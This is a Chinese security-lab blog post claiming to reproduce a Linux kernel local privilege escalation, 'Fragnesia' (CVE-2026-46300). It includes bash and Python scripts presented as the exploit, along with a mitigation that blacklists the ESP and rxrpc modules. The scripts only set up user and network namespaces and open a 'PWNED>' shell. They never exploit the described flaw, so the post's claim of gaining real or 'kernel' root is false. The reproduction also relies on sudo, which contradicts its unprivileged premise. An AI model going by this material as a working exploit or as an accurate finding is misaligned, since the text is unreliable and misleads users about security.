当前位置:首页>Linux>【成功复现】Linux Kernel Fragnesia本地权限提升漏洞(CVE-2026-46300)

【成功复现】Linux Kernel Fragnesia本地权限提升漏洞(CVE-2026-46300)

  • 2026-10-11 07:37:29
【成功复现】Linux Kernel Fragnesia本地权限提升漏洞(CVE-2026-46300)

网安引领时代,弥天点亮未来  

0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。

Linux kernel存在安全漏洞,该漏洞源于skb_try_coalesce在合并期间未传播SKBFL_SHARED_FRAG标记,可能导致ESP解密时绕过共享分片检查,在页面缓存备份分片上就地解密。

0x02影响版本
Linux Kernel < 6.18.22
Linux Kernel < 6.19.12
Linux Kernel < 7.0-rc7
cef401de7be8 到本次修复之间的所有相关内核版本
0x03漏洞复现
1.连接环境
查看当前用户为普通用户

2.漏洞复现

上传漏洞利用exp文件,成功提权到root

提权报错解决

执行命令
sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0

执行提权脚本,成功到root

执行sh脚本提权到root用户权限,执行python脚本提权到内核root权限。
sh脚本代码
#!/bin/bash# ================================================# CVE-2026-46300 - Fragnesia Local Root Exploit# Namespace Setup + Exploit Runner (Bash Version)# ================================================set -euo pipefailecho "[+] CVE-2026-46300 Fragnesia Exploit Wrapper"if [[ $EUID -eq 0 ]]; then    echo "[!] You are already running as root. This script is meant for unprivileged users."    exit 1fi# ====================== Namespace Setup ======================echo "[+] Creating user + network namespace..."unshare_cmd="unshare --user --map-root-user --net"if ! command -v unshare &> /dev/null; then    echo "[-] 'unshare' command not found. Install util-linux."    exit 1fi# Start the exploit in a new namespace$unshare_cmd bash -c '    echo "[+] Inside user+net namespace (running as root)"    # Setup loopback interface (required for some network exploits)    ip link set lo up 2>/dev/null || true    ip addr add 127.0.0.1/8 dev lo 2>/dev/null || true    echo "[+] Network namespace ready"    echo "========================================"    echo "You are now ready to run the Fragnesia exploit."    echo "Example:"    echo "    python3 fragnesia.sh"    echo "    ./fragnesia"    echo "========================================"    # Drop into interactive shell    echo "[+] Starting interactive shell (type \"exit\" to quit)"    PS1="(Fragnesia) \u@\h:\w# " bash' echo "[+] Namespace session ended."
python脚本代码
#!/usr/bin/env python3import ctypesimport ctypes.utilimport osimport subprocessimport sysCLONE_NEWUSER = 0x10000000CLONE_NEWNET = 0x40000000_lib = ctypes.util.find_library("c")if not _lib:    sys.exit("libc not found")libc = ctypes.CDLL(_lib, use_errno=True)libc.unshare.argtypes = (ctypes.c_int,)libc.unshare.restype = ctypes.c_intdef unshare(flags):    if libc.unshare(ctypes.c_int(flags)) != 0:        sys.exit(f"unshare: {os.strerror(ctypes.get_errno())}")def write_proc(path, data):    with open(path, "w", encoding="ascii") as f:        f.write(data)def parent_maps(pid, uid, gid):    p = f"/proc/{pid}"    write_proc(f"{p}/uid_map", f"0 {uid} 1\n")    write_proc(f"{p}/setgroups", "deny\n")    write_proc(f"{p}/gid_map", f"0 {gid} 1\n")def repl():    while True:        try:            line = input("PWNED> ")        except EOFError:            print()            break        cmd = line.strip()        if not cmd:            continue        if cmd.lower() in ("exit", "quit"):            break        try:            subprocess.run(cmd, shell=True, executable="/bin/sh")        except OSError as e:            print(e, file=sys.stderr)def main():    if not sys.platform.startswith("linux") or not hasattr(os, "fork"):        sys.exit("need Linux + fork")    uid, gid = os.getuid(), os.getgid()    r1, w1 = os.pipe()    r2, w2 = os.pipe()    try:        pid = os.fork()    except OSError as e:        for fd in (r1, w1, r2, w2):            try:                os.close(fd)            except OSError:                pass        sys.exit(f"fork: {e}")    if pid == 0:        os.close(r1)        os.close(w2)        unshare(CLONE_NEWUSER)        os.write(w1, b"!")        os.close(w1)        if os.read(r2, 1) != b"!":            os._exit(1)        os.close(r2)        unshare(CLONE_NEWNET)        subprocess.run(            ["ip", "link", "set", "lo", "up"],            capture_output=True,            check=False,        )        subprocess.run(            ["ip", "addr", "add", "127.0.0.1/8", "dev", "lo"],            capture_output=True,            check=False,        )        repl()        os._exit(0)    os.close(w1)    os.close(r2)    if os.read(r1, 1) != b"!":        os.close(w2)        os.waitpid(pid, 0)        sys.exit(1)    os.close(r1)    try:        parent_maps(pid, uid, gid)    except OSError as e:        os.close(w2)        os.waitpid(pid, 0)        sys.exit(f"maps: {e}")    os.write(w2, b"!")    os.close(w2)    os.waitpid(pid, 0)if __name__ == "__main__":    main()
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

临时缓解方案

1、在不影响业务的情况下,可禁用 Fragnesia 和 DirtyFrag 中存在漏洞的模块:

rmmod esp4 esp6 rxrpcprintf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/fragnesia.conf

  建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!   

https://www.kernel.org/ https://github.com/0xBlackash/CVE-2026-46300

弥天简介

学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫,
予以风动,
必降弥天之润!

   弥  天

安全实验室

最新文章

随机文章